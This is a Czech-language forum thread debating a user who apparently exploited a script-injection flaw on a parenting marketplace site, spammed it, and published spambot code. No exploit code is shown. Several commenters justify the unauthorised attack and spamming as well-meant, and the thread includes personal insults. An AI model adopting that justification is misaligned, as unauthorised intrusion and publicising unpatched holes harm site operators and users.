Ano, hrubým způsobem jí to napsal Jenda, tys na to neměl kuráž a tak jsi pouze neupřímně přitakával jaká je to prospěšná zpětná vazba. Milá Gréta má určitě za sebou v závěsu administrátorky z mimibazaru, přece si nezredukuješ pool potenciálních samic nějakým přisprostlým dirty talkem ;-) Vážně jsi tak mimořádně nadaný empatik, že si myslíš že považuji naši Grétu za tu Grétu? Nevím o ní nic, může to být Amiga, může to být skutečná puberťačka a dokonce to můžeš být i ty ("Se mi líbí...")! Možná tě ten projekt už vyčerpával, možná jsi udělal nějakou chybu při útoku na mimibazar a teď se toho profilu potřebuješ zbavit a tak jsi vymyslel tuto veřejnou popravu. Už jenom jak tady lituješ že nemáš holčičí krycí identitu :-D
Hele, proč vůbec vedeme tuhle diskuzi? Já si nemyslím že jsi špatný člověk, nebo je s tebou něco špatně, jen jsem tě upozornil na to že to děláš. Tohle je taková exploze přesměrování na všechny možné strany, že to stejně nikam nepovede. Je mi jasné, že si nemyslíš že je to TA Gréta, ale už jen z toho že o téhle existenci mluvíš v ženském rodě, natožpak že se jí zastáváš a považuješ cokoliv co udělá za roztomilé jasně značí, že se dopouštíš kognitivního zkreslení. To co jsem napsal byla jen snaha tě na to upozornit.
Jedním z projevů nabubřelého ega je, že se nabubří hned jak na jeho nabubřelost upozorníš ;-)
*Sigh*. Člověk tě požádá, aby ses rozepsal a místo toho si jen validuješ předsudky. To jsem to řekl nějak nejasně, nebo ti připadalo, že si to nezasluhuje odpověď, nebo proč neodpovíš normálně? Ten projev co popisuješ (tedy ozvat se na výtku) je taky projevem obecně vytýkání něčeho, co druhá osoba vnímá jako nespravedlivé a obecně je tak častý a široký, že je v podstatě jako detekce úplně k ničemu. Nehledě na to že ho používáš teprve zpětně. Něco tě k tomu muselo vést předtím, tak co to bylo?

Upřímně by mě to s tím egem zajímalo, proč si to myslíš, jak se to projevuje. Je to k něčemu? Jak přesně identifikuješ projev ega a ostatní projevy. A tak.
Mám dojem, že vše vyjma spamu Gréta splnila.
+ dávat zdrojáky spambotů, že.
Možná nevím, kde by taková hranice měla být, rozhodně ale věřím, že Grétin "pusinkový útok" je ještě přijatelný. Absolutně nic se nestalo a ty si s dětinskou tvrdohlavostí trváš na svém jakou naše Gréta způsobila hroznou katastrofu. Měl bys přijmout holá fakta a naší milé Grétě se pořádně omluvit :-)
Netrvám na tom že způsobila katastrofu, ale že jde o nepřijatelné jednání za hranou. A ideálně jsem chtěl vést třeba diskuzi o té hranici, snažil jsem se o to už dvakrát, ale nikdo se nechytl.
27.1. 05:52 SKK
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Bystroušák, vieš si ty vôbec niekedy zo seba utiahnuť?...Nemáš náhodou problém s chápaním takých tých bežných situácií vo vzťahoch medzi ľuďmi?... Vieš vôbec zo seba vystúpiť a predstaviť si, ako môže tú istú situáciu vnímať ten druhý? Mňa už to dávno u teba zaujalo.:-)
27.1. 06:40 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
To je takový autista, že dělat si z něj srandu je na hranici etiky :-(
30.1. 14:47 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

že se jí zastáváš a považuješ cokoliv co udělá za roztomilé jasně značí, že se dopouštíš kognitivního zkreslení.

Tak já nemám moc rád když se lidé chovají jako slepé stádo, které by nejraději někoho lynčovalo. Ještě více mne to trápí u chytrých lidí, u nich předpokládám alespoň nějaké základní zábrany a nadhled nad situací. Mimochodem, stádový efekt je také jedním z druhů kognitivního zkreslení.

Gréta se možná vypravila za přípustnou mez ale věřím, že to myslela dobře a skutečně to byla snaha těm stránkám pomoci, viděl jsem ji například pomáhat ve zdejší poradně. Možná že ji prostě nedošlo že něco provedla špatně a tak si ještě dala tu práci a vytvořila pro nás blogový zápisek ve kterém vše sepsala a zdokumentovala. A teď se do ni za její dobře míněnou snahu téměř všichni hrubě dají že raději znechuceně odešla pryč, nebo se zde bojí vystrčit nosánek aby se do ní opět nepustili. Tohle je přeci špatně, ne?

Z doby, kdy to bylo ještě čiré sci-fi si vzpomínám na video z prezentace firmy, která dle svého tvrzení vytvořila fuknční prototyp kvantového počítače a snažila se případným zájemcům prodat výpočetní čas. Jenže ten počítač nikdo nikdy neviděl, neukázali jedinou fotografii, nezveřejnili žádné technické údaje, vlastně ani nebylo jisté, zda je to skutečně kvanotvý počítač. Prostě dejte program, my Vám ho na našem stroji necháme nějakou dobu běžet a pošleme zpátky výsledek. To samozřejmě návštěvníky prezentace dráždilo a neustále se na samotný počítač a praktické řešení ptali, až se jeden z řečníků neudržel a prohlásil něco v duchu: "V case počítače máme zavřeného kouzelného skřítka. Co je Vám do toho, jak výpočty realizujeme."
Tím chci říct, že vlastně vůbec nezáleží na tom jestli je naše Gréta opravdová script kiddie puberťačka, jestli se ta Gréta neučí za školou češtinu a programovat, jestli třeba naše Gréta sama není skutečně pokročilým internetovým robotem, jestli má Amigovo delirium i světlé chvilky, jestli se pár něčích mozkových gyrů vyzkratovalo nadužíváním kofeinových suplementů a získaly autonomii na zbytku vědomí ;-)

Jediné, co můžeme spolehlivě zkoumat, jsou vnější projevy. No, a ty jsou u naší milé Gréty často prospěšné, to považuji za mnohem důležitější, než jesli je "kouzelným skřítkem v case počítače". V reálném světě by něco takového bylo poměrně bizarní ale internetové fórum snad něco takového ještě unese ;-).

Ale vše co dělá, za roztomilé nepovažuji, "pusinkový útok" opravdu nebylo nic hezkého ale současně také nic za co by měl rozhořčený dav věšet na nejbližší strom. Byl to od ní drobný přešlap v jinak dobrém úmyslu, pokud je dost inteligentní tak jí stačí vše vysvětlit, pokud ne, tak by stejně celá zdejší diskuze postrádala smysl.

A třeba jak rozbila toho skleněného Buddhu, to bych se na ni vydržel zlobit nejméně dobrých pět minut :-)



Upřímně by mě to s tím egem zajímalo, proč si to myslíš, jak se to projevuje

K tomu nemám patřičnou odbornost ale něco bych přeci jen vypíchl.
Nechci se tě dotknout, ale vůbec o sobě a své pravdě nepochybuješ. Tak například máš potíž se zkusit podívat na svět jejíma očima a snažit se pochopit její motivy, to co ty vnímáš jako nesmyslný vandalismus může ona považovat za obecně prospěšnou činnost. Četl jsi vůbec Grétin recept na sněhové pusinky, kterým spamovala, nebo jsi ho apriori odsoudil? Píše tam něco o ruském spamu a obavách, že se mimibazar vývojáři pokusí ošidit. A ono se nakonec ukázalo že měla pravdu, nové stránky nestojí ani za zlámanou grešli. Vážně je to v tomto kontextu vandalismus?
Automaticky předpokládáš, že ví to samé co ty, například že zná kodex bezpečnostní komunity, nebo že vůbec tuší, že něco takového existuje. Na hacking může mít seterotypní pohled z médií a chyby se přece zveřejňují, pořád o tom někde píší a mluví, že.
Btw, nemohu se zbavit pocitu, že do celého problému latentně vnášíš obavy o svoji vlastní počítačovou infrastrukturu a to zkresluje tvůj pohled na celou věc ;-)

 

dávat zdrojáky spambotů, že

Mně vyšší princip mravní nezabránil pokusit se ty skripty spustit. Mám dojem, že Grétin samopal na sněhové pusinky má hlavěň zalitou olovem, alespoň tedy prozatím :-D. Pokud na mimibazaru měli nějakého ruského spambota, tak nelze nijak uškodit zveřejněním analogického zdrojového kódu, naopak je dobré dozvědět se něco o jeho vektoru.

 

vést třeba diskuzi o té hranici

Nemyslím si, že je možné takovou hranici exaktně vytyčit, on to možná překvapivě nebude technický problém. Na formy útoku by se mělo nahlížet jako na pouhé nástroje. No, a nástroj můžeš přece použít jakkoliv, kladívkem můžeš zatloukat hřebíky ale můžeš s ním i druhého přetáhnout přes hlavu. A můžeš s ním opravit dřevěný plot souseda, který o to ale vůbec nestojí a stejně tak můžeš kladívkem zrádně ze zálohy zneškodnit nejhledanějšího terroristu světa. Asi by bylo nutné zohlednit kromě použitých prostředků motiv, prospěšnost daného činu a další jen těžko měřitelné aspekty. Lze o tom dlouze diskutovat ale nedobereme se ničeho. :-)

Bystroushaak avatar 30.1. 16:40 Bystroushaak | skóre: 36 | blog: Bystroushaakův blog | Praha
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Tak já nemám moc rád když se lidé chovají jako slepé stádo, které by nejraději někoho lynčovalo. Ještě více mne to trápí u chytrých lidí, u nich předpokládám alespoň nějaké základní zábrany a nadhled nad situací. Mimochodem, stádový efekt je také jedním z druhů kognitivního zkreslení.
To vůbec nevím kde jsi vzal, když nás tu kritizujících bylo jen pár. Rozhodně v době kdy jsem se do diskuze pustil já, tak nás tu bylo kolik? Dva? To se ti zdá jako stádo?
Gréta se možná vypravila za přípustnou mez ale věřím, že to myslela dobře a skutečně to byla snaha těm stránkám pomoci, viděl jsem ji například pomáhat ve zdejší poradně. Možná že ji prostě nedošlo že něco provedla špatně a tak si ještě dala tu práci a vytvořila pro nás blogový zápisek ve kterém vše sepsala a zdokumentovala. A teď se do ni za její dobře míněnou snahu téměř všichni hrubě dají že raději znechuceně odešla pryč, nebo se zde bojí vystrčit nosánek aby se do ní opět nepustili. Tohle je přeci špatně, ne?
Přestaň akceptovat její personu teen holky a předpokládej, že za tím stojí znuděný, pravděpodobně dospělý, pravděpodobně inteligentní člověk, který velmi pravděpodobně není Greta, není ženská a už vůbec nemá žádné dobré záměry nad to se sofistikovaně pobavit.
Jediné, co můžeme spolehlivě zkoumat, jsou vnější projevy. No, a ty jsou u naší milé Gréty často prospěšné, to považuji za mnohem důležitější, než jesli je "kouzelným skřítkem v case počítače". V reálném světě by něco takového bylo poměrně bizarní ale internetové fórum snad něco takového ještě unese ;-).
Ano a ne. Kdysi jsem tu o tom psal blog Turingův diskutér. Skutečně je jedno kdo to konkrétně je a klidně tu personu můžeš žrát. Co není jedno je když se podle toho tak pak fakt začneš chovat. Například popřeš svůj interní systém pro morálku, protože je to přece roztomilá teenagerka, která to myslela dobře se sněhovou pusinkou, hehe, hihi.
Nechci se tě dotknout, ale vůbec o sobě a své pravdě nepochybuješ. Tak například máš potíž se zkusit podívat na svět jejíma očima a snažit se pochopit její motivy, to co ty vnímáš jako nesmyslný vandalismus může ona považovat za obecně prospěšnou činnost ..
Ach jo. Gréta není Gréta. Lže ti už jen tím, že se vydává za někoho kým není. Naprosto neexistuje důvod, proč předpokládat že je to žena, že je to mladá holka, nebo že je nějak naivní. Je to vymyšlená postava, něco jako herec v divadle, který hraje tak dobře, že pořád zapomínáš že ve skutečnosti není tou rolí, kterou hraje.

BTW: Nevnímám to jako nesmyslný vandalismus, vandalismus často dává perfektní smysl. To není důvod ho tolerovat.
Automaticky předpokládáš, že ví to samé co ty, například že zná kodex bezpečnostní komunity, nebo že vůbec tuší, že něco takového existuje. Na hacking může mít seterotypní pohled z médií a chyby se přece zveřejňují, pořád o tom někde píší a mluví, že.
Větší část z toho je prostá logika. Například nerozhazovat kolem věci, které můžou jednoduše škodit, neukazovat neschopným a nezodpovědným lidem jak na to a tak.
Btw, nemohu se zbavit pocitu, že do celého problému latentně vnášíš obavy o svoji vlastní počítačovou infrastrukturu a to zkresluje tvůj pohled na celou věc ;-)
Moje počítačová infrastruktura nestaví na nehacknutelnosti, naopak se snažím explicitně předpokládat, že úplně všechno bylo hacknuto.
Mně vyšší princip mravní nezabránil pokusit se ty skripty spustit. Mám dojem, že Grétin samopal na sněhové pusinky má hlavěň zalitou olovem, alespoň tedy prozatím :-D. Pokud na mimibazaru měli nějakého ruského spambota, tak nelze nijak uškodit zveřejněním analogického zdrojového kódu, naopak je dobré dozvědět se něco o jeho vektoru.
Každý trochu schopný programátor je schopný chrlit podobné věci na počkání v podstatě do nekonečna a nedá se proti tomu automatizovaně bránit.

Je dobré si uvědomit, že útočník má vždycky výhodu. Sebelepší vojenská jednotka bude mít problém s připraveným náhlým útokem. Útočník je prakticky vždy ve výhodě. Prakticky všechno lze zničit a internet a většina software stojí do velké míry na tom, že to většina lidí nedělá.

Pokud máš představu, že existuje bezpečný software, nebo že nějaké služby jsou bezpečné, tak je to jen iluze způsobená tím že nevíš dost, nebo nemáš dost velkou představivost. Jediný důvod proč to všechno pořád funguje je že lidi vesměs dospěli k názoru, že lepší je svět kde můžeš ostatním věřit a kooperovat s nimi, než na ně útočit.
Nemyslím si, že je možné takovou hranici exaktně vytyčit, on to možná překvapivě nebude technický problém.
S tím souhlasím, jen dodám že jsem si nikdy nemyslel, že je to technický problém.
Na formy útoku by se mělo nahlížet jako na pouhé nástroje. No, a nástroj můžeš přece použít jakkoliv, kladívkem můžeš zatloukat hřebíky ale můžeš s ním i druhého přetáhnout přes hlavu. A můžeš s ním opravit dřevěný plot souseda, který o to ale vůbec nestojí a stejně tak můžeš kladívkem zrádně ze zálohy zneškodnit nejhledanějšího terroristu světa.
Vidíš, konečně se někam dostáváme. Já s tím pohledem jako na nástroje souhlasím, dokonce i souhlasím s tím pohledem na použití. Rozdíl právě dělá to jak a jestli ho použiješ. A Gréta ten svůj použila vysloveně negativně.

Zbraně taky nenecháváme válet se na ulici a jako společnost je tolerujeme. Co netolerujeme je jejich neoprávněné, či neschválené použití.
7.2. 15:16 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

tak nás tu bylo kolik? Dva? To se ti zdá jako stádo?

Dva? Já před tvým komentářem napočítal nejméně čtyři další ;-). A nevím, nevím, jak by to dopadlo bez mé intervence, kolik dalších by se připojilo ke stádu podobně jako Karel Benák a Odin1918. Ale uznávám, že tvá reakce byla v porovnání nejméně afektovaná.

Přestaň akceptovat její personu teen holky

Já zase nevím proč ti její persona tak vadí? Měli bychom hodnotit to, co provedla a s jakým úmyslem, ne jestli je naše Gréta roztomilá malá naivní holčička nebo nějaký starý zarostlý zanedbaný opilec s vychlastaným mozkem, to jsou přece argumenty ad hominem a ještě pravděpodobně špatně cílené.

Je to vlastně stejný druh problému, jako v tom tvém odkazovaném zápisku o králi Mohamedánů. Kdo je zač si stejně nikdy nemůžeme s jistotou ověřit a je zbytečné na to brát zřetel. Pouze se ta nejednoznačnost může stát zdrojem předsudků vůči milé Grétě. Více nadhledu a řídit se svým vlastním článkem ;-)

 

A Gréta ten svůj použila vysloveně negativně.

Tak já nesouhlasím s tím, že se jednalo o vandalismus a že by svoje "nástroje" použila čistě negativně, není nic špatného na tom hlásit chyby. A není nic špatného ani na tom uvědomit uživatele, pokud se správci nemají k opravám. Ano, šlo zvolit jinou, méně agresivní formu, méně obtěžovat uživatele problémy, kterým jen stěží rozumí nebo se s nimi rovnou hádat a ztratit nervy ;-).

Přinejhorším bych to viděl někde v půli cesty, pokud ale budeme respektovat její dobrý úmysl tak se jednalo spíše o pozitivní "použití nástrojů". Zřejmě je chyba hodnotit jednotlivé skutky zvlášť, no, a pokud si provedeme celou bilnaci toho Grétina působení na bazaru a nebudeme hodnotit pouze spambota a zohledníme také hlášení chyb a nedostatků, tlak na vývojáře aby odvedli poctivou práci a nikoho nepodvedli, odhalení vektoru jiných spambotů etc. tak nám vyjde zaručeně pozitivní působení.

Je to podobné například situaci, kdy tě doktor chce naočkovat vakcínou, tak tě také musí bodnout jehlou. Tomu bys přece také nevynadal :-).

BTW, myslím si, že reakce davu by byla identická i kdyby mimibazar rovnou pwnla nebo pouze nespecificky napsala, že mají nezabezpečený tag script blozích.

26.1. 10:45 SKK
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
konečne nejaký zdravý postoj... títo niektorí moralizujúci chlapci sa berú strašne vážne...veď neurobil_a nič také hrozné... a ten recept na pusinky je asi použiteľný... i keď v mojom prípade ťažko, podobne ako tie návody na zabezpečenie účtov
26.1. 09:25 SKK
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
máš na polročnom vysvedčení zo slohu jednotku s hviezdičkou a tá štvorka zo správania a vylúčenie z elitného klubu dokonalých mamičiek ťa mrzieť nemusí, možno ťa raz prijmú do klubu oteckov a budeš nosiť svoje dieťatko v plachetke na trávu na vlastných prsiach ;-)
27.1. 15:00 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
a vylúčenie z elitného klubu dokonalých mamičiek ťa mrzieť nemusí
Ty taky vidíš elitní kluby všude kolem sebe...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
27.1. 16:01 SKK
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
no a nie sú tie mamičky na všelijakých tých Mimiblabla a Modrých koníkoch tak trochu niečo ako náboženská sekta?:-)

27.1. 16:13 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Náboženskou sektou je dneska kde co, např. Linuxáci, takže každý člověk je ve výsledku asi v půltuctu fanatických sektách ;-) To potom lehce ztrácí na významu.
27.1. 16:20 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
takže každý člověk je ve výsledku asi v půltuctu fanatických sektách ;-) To potom lehce ztrácí na významu.
Asi tak...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
Fluttershy, yay! avatar 27.1. 16:38 Fluttershy, yay! | skóre: 85 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
[zdejší verbež se učí o intersekcionalitě]
27.1. 16:41 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Já se teda o tom nic neučim, to mam teda na práci užitečnější věci...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
Fluttershy, yay! avatar 27.1. 16:47 Fluttershy, yay! | skóre: 85 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
škola hrou
27.1. 17:21 kralyk z abclinuxu | skóre: 29 | blog:
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Huh? Tady nedošlo k žádnému učení, ani hrou ani jinak, prostě jsi jen vytáhl sociologický pojem.

O užitečnosti těchto pojmů mam svou pochybnost, viz taky minulá diskuse, kde vyšla najevo vzájemná nekonzistence dalších oblíbených sociologických pojmů...
Přidej se k odporu proti eko-fanatismu! Konzumuj prémiové informace plné zdravého rozumu a vyhýbej se těm nevhodným!
28.1. 00:26 _
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Nemyslím si, že si můžeš dovolit vyjadřovat se povýšeně, zpravidla tu sakrasticky vyplivneš náhodný výraz ze slovníku cizích slov a to je celý tvůj projev. Pochybuji že to v někom vyvolá dojem "Kolibáč je mega filozof"
28.1. 06:56 Radovan
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Tak samozřejmě, Tux-Tux-Klan ruléz!!!
27.1. 12:03 Jardik
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Na abicku taky sly dat do blogu javascripty a pomoci css divy s absolutni pozici. Kdyz jsem byl jeste mala holcicka, tak jsem to sem parkrat dal, z nahledu blogpostu se to pak zobrazovalo i na titulce. No a pak to kvuli mne zakazali.
30.1. 14:58 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Přestaň trucovat, utři si slzičky a vylez.
Blaazen avatar 31.1. 16:28 Blaazen | skóre: 23 | blog: BL
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Třeba zrovna hacknuje ten novej dálniční eshop.
Gréta avatar 2.2. 16:39 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
2.2. 14:11 Yomagn'tho
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

No, zaregistroval jsem se tam také, stále ten jsinject neměli ošetřený tak jsem se zeptal zda si vůbec uvědomují, jak je to závažná chyba, především když ji Grétka vytroubila do světa a zda bezpečnostní připomínky té naší Grétky berou vážně. A jak myslíte, že to dopadlo? DOSTAL JSEM BAN :-D :-D :-D

S těma laktačníma psychózama se skutečně nedá rozumně bavit a jestli to Grétka s adminkama vydržela diskutovat celé dva týdny, tak hluboce smekám, mě by v mozku praskla cévka možná už do hodiny.

Zde na ukázku jedna z reakcí:

Prosím, co je tento "nevímkdo" zač? *-)Kamil Vávra (Yomagn´tho) ID 639838.
Napsal mi dlouhatánský prapodivný mail týkající se Gréty (pusinky, čočková polévka atd.... nedávno tu strašila), oslovuje mě Milá Administrátorko ,-) a žvaní nesmysly. (smich)
Gréta avatar 4.2. 11:38 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

ještě by mě jako zajímalo kdo jako byl tvojeMámaYxd protože já to nebyla :D :D

Gréta avatar 2.2. 16:45 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

a že se už jako vubec nezlobíte a že jestli ještě jo tak už jenom trošičku???? sem vám taky všechny ty sprosťárny taky vodpustila já vim že ste to jako mysleli dobře já to taky s těma matronama myslela dobře problém maj vony nééé my ;D

Gréta avatar 5.2. 11:53 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
7.2. 15:20 BLEK.ův bratranec
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Za trest tisíckrát na mimibazar napíšeš "Už nikdy nebudu spamovat" a vše ti bude odpuštěno! :-D
vencour avatar 7.2. 21:23 vencour | skóre: 56 | blog: Tady je Vencourovo | Praha+západní Čechy
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Jestli je to tak, že správci chlíva se bránili změně po 20 dní, tak medializace v dnešní době je jediná věc, která to změní.
A řešení přes policii mi zavání tím, že se to celé zavře a vyhnije to.
Takže pokud by to tak bylo, tak za mne dobrý.
Ty nejhlubší objevy nečekají nutně za příští hvězdou. Jsou uvnitř nás utkány do vláken, která nás spojují, nás všechny.
Gréta avatar 12.2. 18:05 Gréta | skóre: 15 | blog: Grétin blogísek | Stockholm
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej

už to asi vopravujou hele takže za mě taky dobrý ;D

vencour avatar 12.2. 20:36 vencour | skóre: 56 | blog: Tady je Vencourovo | Praha+západní Čechy
Rozbalit Rozbalit vše Re: mimibazar je děsně nebezpečnej
Tak vidíš, že stojí za to nemlčet.
Ty nejhlubší objevy nečekají nutně za příští hvězdou. Jsou uvnitř nás utkány do vláken, která nás spojují, nás všechny.

Založit nové vláknoNahoru

ISSN 1214-1267   www.czech-server.cz
© 1999-2015 Nitemedia s. r. o. Všechna práva vyhrazena.